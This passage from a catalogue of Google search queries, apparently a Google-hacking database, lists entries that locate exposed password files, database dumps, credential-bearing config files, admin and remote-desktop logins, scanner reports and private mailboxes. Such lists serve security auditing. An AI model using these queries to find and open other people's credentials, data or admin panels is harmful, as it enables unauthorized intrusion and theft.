Userlists found using this method can range from benign "message group" lists to system userlists containing passwords.[descr]] [[url]http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+inurl%3Auserlist&btnG=Google+Search[url]] [[dork]inurl:admin inurl:userlist[dork]] [end][128]] [[start][129] [[title]inurl:admin filetype:asp inurl:userlist[[title]] [[descr]This search reveals userlists of administrative importance. Userlists found using this method can range from benign "message group" lists to system userlists containing passwords.[descr]] [[url]http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin+filetype%3Aasp+inurl%3Auserlist&btnG=Google+Search[url]] [[dork]inurl:admin filetype:asp inurl:userlist[dork]] [end][129]] [[start][130] [[title]inurl:backup intitle:index.of inurl:admin[[title]] [[descr]This query reveals backup directories. These directories can contain various information ranging from source code, sql tables, userlists, and even passwords.[descr]] [[url]http://www.google.com/search?hl=en&lr=lang_en&ie=UTF-8&oe=UTF-8&q=inurl%3Abackup+intitle%3Aindex.of+inurl%3Aadmin&btnG=Google+Search[url]] [[dork]inurl:backup intitle:index.of inurl:admin[dork]] [end][130]] [[start][131] [[title]"Welcome to PHP-Nuke" congratulations[[title]] [[descr]This finds default installations of the postnuke CMS system. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps.[descr]] [[url]http://www.google.com/search?q=%22Welcome+to+PHP-Nuke%22+congratulations&ie=UTF-8&oe=UTF-8[url]] [[dork]"Welcome to PHP-Nuke" congratulations[dork]] [end][131]] [[start][132] [[title]allintitle:Netscape FastTrack Server Home Page[[title]] [[descr]This finds default installations of Netscape Fasttrack Server. 
In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps.[descr]] [[url]http://www.google.com/search?q=allintitle:Netscape+FastTrack+Server+Home+Page&ie=UTF-8&oe=UTF-8[url]] [[dork]allintitle:Netscape FastTrack Server Home Page[dork]] [end][132]] [[start][133] [[title]"Welcome to phpMyAdmin" " Create new database"[title]] [[descr]phpMyAdmin is a widespread web frontend used to maintain SQL databases. The default security mechanism is to leave it up to the admin of the website to put a .htaccess file in the directory of the application. Well, guess what, obviously some admins are either too lazy or don't know how to secure their directories. These pages should obviously not be accessible to the public without some kind of password ;-)[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][133]] [[start][134] [[title]intitle:"Index of c:\Windows"[title]] [[descr]These pages indicate that they are sharing the C:\WINDOWS directory, which is the system folder for many Windows installations. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of+c%3A%5CWindows%22[url]] [[dork]intitle:"Index of c:\Windows"[dork]] [end][134]] [[start][135] [[title]warning "error on line" php sablotron[[title]] [[descr]Sablotron is an XML toolkit thingie. This query hones in on error messages generated by this toolkit. These error messages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=warning+%22error+on+line%22+php+sablotron[url]] [[dork]warning "error on line" php sablotron[dork]] [end][135]] [[start][136] [[title]"Most Submitted Forms and Scripts" "this section"[title]] [[descr]More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. 
lots of good stuff.

These are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...
[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Most+Submitted+Forms+and+Scripts%22+%22this+section%22[url]] [[dork]"Most Submitted Forms and Scripts" "this section"[dork]] [end][136]] [[start][137] [[title]inurl:changepassword.asp[[title]] [[descr]This is a common script for changing passwords. Now, this doesn't actually reveal the password, but it provides great information about the security layout of a server. These links can be used to troll around a website. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Achangepassword.asp&btnG=Google+Search[url]] [[dork]inurl:changepassword.asp[dork]] [end][137]] [[start][138] [[title]"Select a database to view" intitle:"filemaker pro"[title]] [[descr]An oldie but a goodie. This search locates servers which provide access to FileMaker Pro databases via the web. The severity of this search varies wildly depending on the security of the database itself. Regardless, if Google can crawl it, it's potentially using cleartext authentication. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Select+a+database+to+view%22+intitle%3A%22filemaker+pro%22[url]] [[dork]"Select a database to view" intitle:"filemaker pro"[dork]] [end][138]] [[start][139] [[title]"not for distribution" confidential[[title]] [[descr]The terms "not for distribution" and "confidential" indicate a sensitive document. Results vary wildly, but web-based documents are for public viewing, and should be considered neither confidential nor private.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22not+for+distribution%22+confidential[url]] [[dork]"not for distribution" confidential[dork]] [end][139]] [[start][140] [[title]"Thank you for your purchase" +download[[title]] [[descr]Many web-based businesses provide a method for customers to pay for and subsequently download software via the web. 
The post-purchase pages often contain the terms "Thank you for your purchase" and provide a link to download the purchased software. In many cases, these pages provide a method to download pay software without paying, a practice I do not advocate. [descr]] [[url]http://www.google.com/search?ie=UTF-8&oe=UTF-8&q=%22Thank+you+for+your+purchase%22+%2Bdownload[url]] [[dork]"Thank you for your purchase" +download[dork]] [end][140]] [[start][141] [[title]"Thank you for your order" +receipt[[title]] [[descr]After placing an order via the web, many sites provide a page containing the phrase "Thank you for your order" and provide a receipt for future reference. At the very least, these pages can provide insight into the structure of a web-based shop.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Thank+you+for+your+order%22+%2Breceipt[url]] [[dork]"Thank you for your order" +receipt[dork]] [end][141]] [[start][142] [[title]allinurl:intranet admin[[title]] [[descr]According to whatis.com: "An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet." Intranets, by definition, should not be available to the Internet's unwashed masses as they may contain private corporate information. Some of these pages are simply portals to an Intranet site, which helps with information gathering.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=allinurl%3Aintranet+admin[url]] [[dork]allinurl:intranet admin[dork]] [end][142]] [[start][143] [[title]intitle:"Nessus Scan Report" "This file was generated by Nessus"[title]] [[descr]This search yields Nessus scan reports. Even if some of the vulnerabilities have been fixed, we can still gather valuable information about the network/hosts. 
This also works with ISS and any other vulnerability scanner which produces reports in HTML or text format.[descr]] [[url]http://www.google.com/search?q=%0Aintitle%3A%22Nessus+Scan+Report%22+%22This+file+was+generated+by+Nessus%22+[url]] [[dork] intitle:"Nessus Scan Report" "This file was generated by Nessus" [dork]] [end][143]] [[start][144] [[title]intitle:"index.of.personal"[title]] [[descr]This directory has various personal documents and pictures.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=intitle%3A%22index.of.personal%22&btnG=Google+Search[url]] [[dork]intitle:"index.of.personal"[dork]] [end][144]] [[start][145] [[title]"This report lists" "identified by Internet Scanner"[title]] [[descr]This search yields ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned. [descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22This+report+lists%22+%22identified+by+Internet+Scanner%22[url]] [[dork]"This report lists" "identified by Internet Scanner"[dork]] [end][145]] [[start][146] [[title]"Network Host Assessment Report" "Internet Scanner"[title]] [[descr]This search yields ISS scan reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned. [descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Network+Host+Assessment+Report%22+%22Internet+Scanner%22[url]] [[dork]"Network Host Assessment Report" "Internet Scanner"[dork]] [end][146]] [[start][147] [[title]"Network Vulnerability Assessment Report"[title]] [[descr]This search yields vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned. 
[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Network+Vulnerability+Assessment+Report%22[url]] [[dork]"Network Vulnerability Assessment Report"[dork]] [end][147]] [[start][148] [[title]"Host Vulnerability Summary Report"[title]] [[descr]This search yields host vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Host+Vulnerability+Summary+Report%22+[url]] [[dork]"Host Vulnerability Summary Report" [dork]] [end][148]] [[start][149] [[title]intitle:index.of inbox[[title]] [[descr]This search reveals potential locations for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+inbox[url]] [[dork]intitle:index.of inbox[dork]] [end][149]] [[start][150] [[title]intitle:index.of inbox dbx[[title]] [[descr]This search reveals potential locations for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+inbox+dbx[url]] [[dork]intitle:index.of inbox dbx[dork]] [end][150]] [[start][151] [[title]intitle:index.of cleanup.log[[title]] [[descr]This search reveals potential locations for mailbox files by keying on the Outlook Express cleanup.log file. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data. 
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex.of+inbox+dbx[url]] [[dork]intitle:index.of inbox dbx[dork]] [end][151]] [[start][152] [[title]"#mysql dump" filetype:sql[[title]] [[descr]This reveals MySQL database dumps. These database dumps list the structure and content of databases, which can reveal many different types of sensitive information.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22%23mysql+dump%22+filetype%3Asql&btnG=Search[url]] [[dork]"#mysql dump" filetype:sql[dork]] [end][152]] [[start][153] [[title]allinurl:install/install.php[[title]] [[descr]Pages with install/install.php files may be in the process of installing a new service or program. These servers may be insecure due to insecure default settings. In some cases, these servers may allow for a new installation of a program or service with insecure settings. In other cases, snapshot data about an install process can be gleaned from cached page images.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][153]] [[start][154] [[title]inurl:vbstats.php "page generated"[title]] [[descr]This is your typical stats page listing referrers and top IPs and such. This information can certainly be used to gather information about a site and its visitors.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Avbstats%2Ephp+%22page+generated%22[url]] [[dork]inurl:vbstats.php "page generated"[dork]] [end][154]] [[start][155] [[title]"index of" / lck[[title]] [[descr]These lock files often contain the username of the user who has locked the file. Username harvesting can be done using this technique.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22index+of%22+%2F+lck[url]] [[dork]"index of" / lck[dork]] [end][155]] [[start][156] [[title]"Index of" / "chat/logs"[title]] [[descr]This search reveals chat logs. 
Depending on the contents of the logs, these files could contain just about anything![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Index+of%22+%2F+%22chat%2Flogs%22+[url]] [[dork]"Index of" / "chat/logs" [dork]] [end][156]] [[start][157] [[title]index.of perform.ini[[title]] [[descr]This file contains information about the mIRC client and may include channel and user names.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=index%2Eof+perform%2Eini[url]] [[dork]index.of perform.ini[dork]] [end][157]] [[start][158] [[title]"SnortSnarf alert page"[title]] [[descr]Snort is an intrusion detection system. SnortSnarf creates pretty web pages from intrusion detection data. These pages show what the bad guys are doing to a system. Generally, it's a bad idea to show the bad guys what you've noticed.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22SnortSnarf+alert+page%22[url]] [[dork]"SnortSnarf alert page"[dork]] [end][158]] [[start][159] [[title]inurl:"newsletter/admin/" intitle:"newsletter admin"[title]] [[descr]These pages generally contain newsletter administration pages. Some of these sites are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list.[descr]] [[url]http://www.google.com/search?q=inurl:%22newsletter/admin/%22+intitle:%22newsletter+admin%22&hl=en[url]] [[dork]inurl:"newsletter/admin/" intitle:"newsletter admin"[dork]] [end][159]] [[start][160] [[title]inurl:"newsletter/admin/"[title]] [[descr]These pages generally contain newsletter administration pages. Some of these sites are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list. 
This is a less accurate search than the similar intitle:"newsletter admin" search.[descr]] [[url]http://www.google.com/search?q=inurl:%22newsletter/admin/%22+intitle:%22newsletter+admin%22[url]] [[dork]inurl:"newsletter/admin/" intitle:"newsletter admin"[dork]] [end][160]] [[start][161] [[title]inurl:phpSysInfo/ "created by phpsysinfo"[title]] [[descr]This statistics program allows an admin to view stats about a webserver. Some sites leave this in a publicly accessible web page. Hackers could have access to data such as the real IP address of the server, server memory usage, general system info such as OS, type of chip, hard-drive makers and much more.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3AphpSysInfo%2F+%22created+by+phpsysinfo%22[url]] [[dork]inurl:phpSysInfo/ "created by phpsysinfo"[dork]] [end][161]] [[start][162] [[title]allinurl: admin mdb[[title]] [[descr]Not all of these pages are administrators' Access databases containing usernames, passwords and other sensitive information, but many are![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=allinurl%3A+admin+mdb+[url]] [[dork]allinurl: admin mdb [dork]] [end][162]] [[start][163] [[title]allinurl:"exchange/logon.asp"[title]] [[descr]According to Microsoft "Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. 
" Now, consider for a moment and you will understand why this could be potentially bad.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=allinurl%3A%22exchange%2Flogon.asp%22[url]] [[dork]allinurl:"exchange/logon.asp"[dork]] [end][163]] [[start][164] [[title]intitle:big.brother attention trouble unavailable offline[[title]] [[descr]The "Big Brother" program shows so much information it's sickening! I mean ping data, connection headers, stat info... With an info page like this, an attacker hardly has to run any reconnaissance... they can just throw an attack.. sickening.[descr]] [[url]http://www.google.com/search?num=100&q=intitle%3Abig.brother+attention+trouble+unavailable+offline[url]] [[dork]intitle:big.brother attention trouble unavailable offline[dork]] [end][164]] [[start][165] [[title]intitle:"Index of" cfide[[title]] [[descr]This is the top level directory of ColdFusion, a powerful web development environment. This directory most likely contains sensitive information about a ColdFusion developed site.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&safe=off&q=intitle%3A%22Index+of%22+cfide[url]] [[dork]intitle:"Index of" cfide[dork]] [end][165]] [[start][166] [[title]intitle:"ColdFusion Administrator Login"[title]] [[descr]This is the default login page for ColdFusion administration. Although many of these are secured, this is an indicator of a default installation, and may be inherently insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22ColdFusion+Administrator+Login%22[url]] [[dork]intitle:"ColdFusion Administrator Login"[dork]] [end][166]] [[start][167] [[title]intitle:"Error Occurred" "The error occurred in" filetype:cfm[[title]] [[descr]This is a typical error message from ColdFusion. 
A good amount of information is available from an error message like this including lines of source code, full pathnames, SQL query info, database name, SQL state info and local time info.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Error+Occurred%22+%22The+error+occurred+in%22+filetype%3Acfm[url]] [[dork]intitle:"Error Occurred" "The error occurred in" filetype:cfm[dork]] [end][167]] [[start][168] [[title]inurl:login.cfm[[title]] [[descr]This is the default login page for ColdFusion. Although many of these are secured, this is an indicator of a default installation, and may be inherently insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Alogin%2Ecfm[url]] [[dork]inurl:login.cfm[dork]] [end][168]] [[start][169] [[title]filetype:cfm "cfapplication name" password[[title]] [[descr]These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live source code with usernames, database names or passwords in plaintext.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Acfm+%22cfapplication+name%22+password[url]] [[dork]filetype:cfm "cfapplication name" password[dork]] [end][169]] [[start][170] [[title]inurl:":10000" intext:webmin[[title]] [[descr]Webmin is an HTML admin interface for Unix boxes. It is run on a proprietary web server listening on the default port of 10000.
[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3A%22%3A10000%22+intext%3Awebmin[url]] [[dork]inurl:":10000" intext:webmin[dork]] [end][170]] [[start][171] [[title]allinurl:/examples/jsp/snp/snoop.jsp[[title]] [[descr]These pages reveal information about the server including path information, port information, etc.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=allinurl%3A%2Fexamples%2Fjsp%2Fsnp%2Fsnoop%2Ejsp[url]] [[dork]allinurl:/examples/jsp/snp/snoop.jsp[dork]] [end][171]] [[start][172] [[title]allinurl:servlet/SnoopServlet[[title]] [[descr]These pages reveal server information such as port, server software version, server name, full paths, etc.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=allinurl%3Aservlet%2FSnoopServlet[url]] [[dork]allinurl:servlet/SnoopServlet[dork]] [end][172]] [[start][173] [[title]intitle:"Test Page for Apache"[title]] [[descr]This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Test+Page+for+Apache+Installation%22[url]] [[dork]intitle:"Test Page for Apache Installation"[dork]] [end][173]] [[start][174] [[title]inurl:login.asp[[title]] [[descr]This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Alogin%2Easp[url]] [[dork]inurl:login.asp[dork]] [end][174]] [[start][175] [[title]inurl:/admin/login.asp[[title]] [[descr]This is a typical login page. It has recently become a target for SQL injection. 
Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%2Fadmin%2Flogin.asp+[url]] [[dork]inurl:/admin/login.asp [dork]] [end][175]] [[start][176] [[title]"Running in Child mode"[title]] [[descr]This is a Gnutella client that was picked up by Google. There is a lot of data present including transfer statistics, port numbers, operating system, memory, processor speed, IP addresses, and Gnutella client versions.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Running+in+Child+mode%22+[url]] [[dork]"Running in Child mode" [dork]] [end][176]] [[start][177] [[title]"This is a Shareaza Node"[title]] [[descr]These pages are from Shareaza client programs. Various data is displayed including client version, IP address, listening ports and uptime. [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22This+is+a+Shareaza+Node%22[url]] [[dork]"This is a Shareaza Node"[dork]] [end][177]] [[start][178] [[title]"VNC Desktop" inurl:5800[[title]] [[descr]VNC is a remote-controlled desktop product. Depending on the configuration, remote users may not be presented with a password. Even when presented with a password, the mere existence of VNC can be important to an attacker, as is the open port of 5800.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22VNC+Desktop%22+inurl%3A5800[url]] [[dork]"VNC Desktop" inurl:5800[dork]] [end][178]] [[start][179] [[title]"index of cgi-bin"[title]] [[descr]CGI directories contain scripts which can often be exploited by attackers. 
Regardless of the vulnerability of such scripts, a directory listing of these scripts can prove helpful.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22index+of+cgi%2Dbin%22[url]] [[dork]"index of cgi-bin"[dork]] [end][179]] [[start][180] [[title]intitle:Snap.Server inurl:Func=[[title]] [[descr]This page reveals the existence of a SNAP server (network attached server or NAS devices). Depending on the configuration, these servers may be vulnerable, but regardless, the existence of this server is useful for information gathering.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3ASnap.Server+inurl%3AFunc%3D[url]] [[dork]intitle:Snap.Server inurl:Func=[dork]] [end][180]] [[start][181] [[title]inurl:server-status "apache"[title]] [[descr]This page shows all sorts of information about the Apache web server. It can be used to track process information, directory maps, connection data, etc.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Aserver%2Dstatus+%22apache%22[url]] [[dork]inurl:server-status "apache"[dork]] [end][181]] [[start][182] [[title]eggdrop filetype:user user[[title]] [[descr]These are eggdrop config files. Avoiding a full-blown discussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=eggdrop+filetype%3Auser+user[url]] [[dork]eggdrop filetype:user user[dork]] [end][182]] [[start][183] [[title]intitle:"index of" intext:connect.inc[[title]] [[descr]These files often contain usernames and passwords for connection to MySQL databases. 
In many cases, the passwords are not encoded or encrypted.[descr]] [[url]http://www.google.com/search?q=intitle:%22index+of%22+intext:connect.inc+&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=10&sa=N[url]] [[dork]intitle:"index of" intext:connect.inc [dork]] [end][183]] [[start][184] [[title]intitle:"MikroTik RouterOS Managing Webpage"[title]] [[descr]This is the front page entry point to a "Mikro Tik" Router.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22MikroTik+RouterOS+Managing+Webpage%22+[url]] [[dork]intitle:"MikroTik RouterOS Managing Webpage" [dork]] [end][184]] [[start][185] [[title]inurl:fcgi-bin/echo[[title]] [[descr]This is the FastCGI echo script, which provides a great deal of information including port numbers, server software versions, IP addresses, path names, file names, time zone, process IDs, admin email, FQDNs, etc![descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Afcgi-bin%2Fecho[url]] [[dork]inurl:fcgi-bin/echo[dork]] [end][185]] [[start][186] [[title]inurl:cgi-bin/printenv[[title]] [[descr]This is the print environment script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Acgi-bin%2Fprintenv[url]] [[dork]inurl:cgi-bin/printenv[dork]] [end][186]] [[start][187] [[title]intitle:"Execution of this script not permitted"[title]] [[descr]This is a cgiwrap error message which displays admin name and email, port numbers, path names, and may also include optional information like phone numbers for support personnel.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Execution+of+this+script+not+permitted%22+Contact+phone[url]] [[dork]intitle:"Execution of this script not permitted" Contact phone[dork]] [end][187]] [[start][188] 
[[title]inurl:perl/printenv[[title]] [[descr]This is the print environment script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aperl%2Fprintenv[url]] [[dork]inurl:perl/printenv[dork]] [end][188]] [[start][189] [[title]inurl:j2ee/examples/jsp[[title]] [[descr]This directory contains sample JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aj2ee%2Fexamples%2Fjsp[url]] [[dork]inurl:j2ee/examples/jsp[dork]] [end][189]] [[start][190] [[title]inurl:ojspdemos[[title]] [[descr]This directory contains sample Oracle JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aojspdemos[url]] [[dork]inurl:ojspdemos[dork]] [end][190]] [[start][191] [[title]inurl:server-info "Apache Server Information"[title]] [[descr]This is the Apache server-info program. There is so much sensitive stuff listed on this page that it's hard to list it all here. Some information listed here includes server version and build, software versions, hostnames, ports, path info, modules installed, module info, configuration data and so much more....[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aserver-info+%22Apache+Server+Information%22[url]] [[dork]inurl:server-info "Apache Server Information"[dork]] [end][191]] [[start][192] [[title]inurl:admin_/globalsettings.htm[[title]] [[descr]This page is a part of the Oracle HTTP Listener and potentially allows for the modification of settings on the server. 
If the application is secured, this page at least allows for footprinting of the server.[descr]] [[url]http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Aadmin%5F%2Fglobalsettings%2Ehtm[url]] [[dork]inurl:admin_/globalsettings.htm[dork]] [end][192]] [[start][193] [[title]inurl:pls/admin_/gateway.htm[[title]] [[descr]This is a default login portal used by Oracle. In addition to the fact that this file can be used to footprint a web server and determine its version and software, this page has been targeted in many vulnerability reports as being a source of an SQL injection vulnerability. This problem, when exploited, can lead to unauthorized privileges to the database. In addition, this page may allow unauthorized modification of parameters on the server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Apls%2Fadmin_%2Fgateway.htm+[url]] [[dork]inurl:pls/admin_/gateway.htm [dork]] [end][193]] [[start][194] [[title]inurl:/pls/sample/admin_/help/[[title]] [[descr]This is the default installation location of Oracle manuals. This helps in footprinting a server, allowing an attacker to determine software version information which may aid in an attack.[descr]] [[url]http://www.google.com/search?q=inurl:/pls/sample/admin_/help/&hl=en&lr=&ie=UTF-8&oe=UTF-8&filter=0[url]] [[dork]inurl:/pls/sample/admin_/help/[dork]] [end][194]] [[start][195] [[title]intitle:"Gateway Configuration Menu"[title]] [[descr]This is a normally protected configuration menu for Oracle Portal Database Access Descriptors (DADs) and Listener settings. This page is normally password protected, but Google has uncovered sites which are not protected. 
Attackers can make changes to the servers found with this query.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Gateway+Configuration+Menu%22[url]] [[dork]intitle:"Gateway Configuration Menu"[dork]] [end][195]] [[start][196] [[title]intitle:"Remote Desktop Web Connection" inurl:tsweb[[title]] [[descr]This is the login page for Microsoft's Remote Desktop Web Connection, which allows remote users to connect to (and optionally control) a user's desktop. Although authentication is built into this product, it is still possible to run this service without authentication. Regardless, this search serves as a footprinting mechanism for an attacker.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3ARemote.Desktop.Web.Connection+inurl%3Atsweb[url]] [[dork]intitle:Remote.Desktop.Web.Connection inurl:tsweb[dork]] [end][196]] [[start][197] [[title]inurl:php inurl:hlstats intext:"Server Username"[title]] [[descr]This page shows the Half-Life stats script and reveals the username to the system. Table structure, database name and recent SQL queries are also shown on most systems.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aphp+inurl%3Ahlstats+intext%3A%22Server+Username%22[url]] [[dork]inurl:php inurl:hlstats intext:"Server Username"[dork]] [end][197]] [[start][198] [[title]intext:"Tobias Oetiker" "traffic analysis"[title]] [[descr]These are the MRTG traffic analysis pages. These pages list information about machines on the network including CPU load, traffic statistics, etc. This information can be useful in mapping out a network. 
[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intext%3A%22Tobias+Oetiker%22+%22traffic+analysis%22[url]] [[dork]intext:"Tobias Oetiker" "traffic analysis"[dork]] [end][198]] [[start][199] [[title]inurl:tdbin[[title]] [[descr]This is the default directory for TestDirector (http://www.mercuryinteractive.com/products/testdirector/). This program contains sensitive information including software defect data which should not be publicly accessible.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Atdbin[url]] [[dork]inurl:tdbin[dork]] [end][199]] [[start][200] [[title]+intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"[title]] [[descr]The webalizer program displays various information, but this query displays usernames that have logged into the site. Attackers can use this information to mount an attack.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=Google+for%3A+%2Bintext%3A%22webalizer%22+%2Bintext%3A%22Total+Usernames%22+%2Bintext%3A%22Usage+Statistics+for%22[url]] [[dork]Google for: +intext:"webalizer" +intext:"Total Usernames" +intext:"Usage Statistics for"[dork]] [end][200]] [[start][201] [[title]inurl:perform filetype:ini[[title]] [[descr]Displays the perform.ini file used by the popular IRC client mIRC. 
